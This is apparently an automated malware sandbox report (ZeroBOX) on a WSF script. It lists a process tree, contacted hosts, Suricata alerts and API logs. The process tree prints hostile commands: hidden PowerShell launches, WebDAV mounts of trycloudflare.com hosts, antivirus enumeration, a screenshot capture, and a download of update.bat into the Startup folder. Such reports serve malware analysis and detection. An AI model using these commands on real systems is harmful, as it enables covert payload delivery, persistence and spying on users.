Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 4, 2025, 12:45 p.m.	May 4, 2025, 1:15 p.m.

Size	1.7KB
Type	XML 1.0 document, ASCII text, with CRLF line terminators
MD5	`2dcc1cf06976f05d33fd0b1a68f0f940`
SHA256	`c61323b489c42a631896a15e0c88a4953bae063bf4870559fe2ea1323ce48574`
CRC32	`BEAC94EF`
ssdeep	`48:X7S2gFqX2Gay6wYwp8UgjTEWjvhA6F/qX/Ja/aS/L69/b4:m2iqXJZZ8Njwy/W/0/z/4/s`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\crash.wsf
1804
- cmd.exe "C:\Windows\System32\cmd.exe" /c net use Z: /delete /y
  2144
  - net.exe net use Z: /delete /y
    2236
- cmd.exe "C:\Windows\System32\cmd.exe" /c net use Z: "\\minutes-amazing-curriculum-maui.trycloudflare.com@SSL\DavWWWRoot"
  2288
  - net.exe net use Z: "\\minutes-amazing-curriculum-maui.trycloudflare.com@SSL\DavWWWRoot"
    2360
- cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat"
  2792
  - powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat' -ArgumentList 'hidden' -WindowStyle Hidden"
    2856
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat" hidden "
      2936
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
        3012
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3012 CREDAT:145409
        1680
      - cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "[System.Net.Dns]::GetHostName()"
        2268
        
        powershell.exe powershell -Command "[System.Net.Dns]::GetHostName()"
        2040
      - cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Select-Object -ExpandProperty displayName" 2>nul
        2888
        
        powershell.exe powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Select-Object -ExpandProperty displayName"
        2912
      - powershell.exe powershell -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $screen = [System.Windows.Forms.Screen]::PrimaryScreen; $bmp = New-Object Drawing.Bitmap $screen.Bounds.Width, $screen.Bounds.Height; $g = [System.Drawing.Graphics]::FromImage($bmp); $g.CopyFromScreen($screen.Bounds.Location, [System.Drawing.Point]::Empty, $screen.Bounds.Size); $bmp.Save('C:\Users\test22\AppData\Local\Temp\test22-PC_screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);"
        2276
      - net.exe net use W: "\\lu-phys-peru-goes.trycloudflare.com@SSL\DavWWWRoot"
        316
      - timeout.exe timeout /t 5
        1900
      - timeout.exe timeout /t 5
        2808
      - timeout.exe timeout /t 5
        2056
      - timeout.exe timeout /t 5
        1516
      - timeout.exe timeout /t 5
        2976
      - timeout.exe timeout /t 5
        2780
      - timeout.exe timeout /t 5
        2208
      - timeout.exe timeout /t 5
        1792
      - timeout.exe timeout /t 5
        2444
      - timeout.exe timeout /t 5
        1256
      - timeout.exe timeout /t 5
        1972
      - timeout.exe timeout /t 5
        2188
      - timeout.exe timeout /t 5
        160
      - timeout.exe timeout /t 5
        528
      - timeout.exe timeout /t 5
        3008
      - timeout.exe timeout /t 5
        1664
      - timeout.exe timeout /t 5
        568
      - timeout.exe timeout /t 5
        1172
- cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat"
  2624
  - powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat\" hidden' -WindowStyle Hidden"
    2812
    - cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat" hidden
      2172
      - net.exe net use "\\travel-sagem-distant-potential.trycloudflare.com@SSL\DavWWWRoot"
        2356
- cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\batchcache\de.bat"
  2092
  - powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://minutes-amazing-curriculum-maui.trycloudflare.com/update.bat', 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat')"
    2884

Name	Response	Post-Analysis Lookup
lu-phys-peru-goes.trycloudflare.com	A 104.16.231.132 A 104.16.230.132	104.16.231.132
www.healyconsultants.com	CNAME healyconsultants.com A 162.159.134.42	162.159.134.42
minutes-amazing-curriculum-maui.trycloudflare.com	A 104.16.231.132 A 104.16.230.132	104.16.230.132
travel-sagem-distant-potential.trycloudflare.com

IP Address	Status	Action
104.16.231.132	Active	Moloch
162.159.134.42	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2034552	ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)	Potentially Bad Traffic
TCP 192.168.56.103:49186 -> 162.159.134.42:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49187 -> 162.159.134.42:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49191 -> 162.159.134.42:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:53673 -> 164.124.101.2:53	2034552	ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)	Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49213 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49213 -> 104.16.231.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49217 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49217 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49217 -> 104.16.231.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49217 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49217 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49217 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49217 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
UDP 192.168.56.103:64894 -> 164.124.101.2:53	2034552	ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)	Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 162.159.134.42:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49212 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49212 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49212 -> 104.16.231.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49223 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49223 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49223 -> 104.16.231.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49213 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49213 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49213 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49213 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49213 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49213 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49215 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49215 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49215 -> 104.16.231.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49235 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49235 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49235 -> 104.16.231.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49218 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49218 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49218 -> 104.16.231.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49218 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49218 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49218 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49218 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49218 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49218 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49235 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49235 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49235 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49235 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49170 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49170 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49170 -> 104.16.231.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49185 -> 162.159.134.42:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49188 -> 162.159.134.42:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49211 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49211 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49211 -> 104.16.231.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49214 -> 104.16.231.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49214 -> 104.16.231.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.103:49214 -> 104.16.231.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49210 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b
TLSv1 192.168.56.103:49169 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b
TLSv1 192.168.56.103:49167 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b
TLSv1 192.168.56.103:49168 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b
TLSv1 192.168.56.103:49217 104.16.231.132:443	None	None	None
TLSv1 192.168.56.103:49209 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b
TLSv1 192.168.56.103:49212 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b
TLSv1 192.168.56.103:49223 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b
TLSv1 192.168.56.103:49213 104.16.231.132:443	None	None	None
TLSv1 192.168.56.103:49215 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b
TLSv1 192.168.56.103:49218 104.16.231.132:443	None	None	None
TLSv1 192.168.56.103:49235 104.16.231.132:443	None	None	None
TLSv1 192.168.56.103:49170 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b
TLSv1 192.168.56.103:49211 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b
TLSv1 192.168.56.103:49214 104.16.231.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b

Queries for the computername (38 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0

Command line console output was observed (32 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: The network connection could not be found. console_handle: 0x0000000b	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: More help is available by typing NET HELPMSG 2250. console_handle: 0x0000000b	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: The command completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:46 p.m.	buffer: Opening PDF: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf ... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:46 p.m.	buffer: Watchdog active... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:46 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:46 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:46 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:46 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:46 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:46 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:46 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:46 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:46 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:47 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:47 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:47 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:47 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:47 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:47 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:47 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:47 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleA May 4, 2025, 12:47 p.m.	buffer: No update.bat found. Waiting... console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:46 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:46 p.m.	buffer: '■' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW May 4, 2025, 12:46 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:46 p.m.	buffer: '■' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW May 4, 2025, 12:46 p.m.	buffer: Connecting to WebDAV... console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:46 p.m.	buffer: Error: Failed to connect to \\travel-sagem-distant-potential.trycloudflare.com@SSL\DavWWWRoot. Check credentials or network. console_handle: 0x0000000b	1	1
WriteConsoleW May 4, 2025, 12:46 p.m.	buffer: Downloading file... console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:46 p.m.	buffer: Success C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:46 p.m.	buffer: Press any key to continue . . . console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 246 events)

Time & API	Arguments	Status	Return
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072db90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072dcd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072dcd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072dcd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072d4d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072d4d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072d4d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072d4d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072d4d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072d4d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072dcd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072dcd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072dcd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072df50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
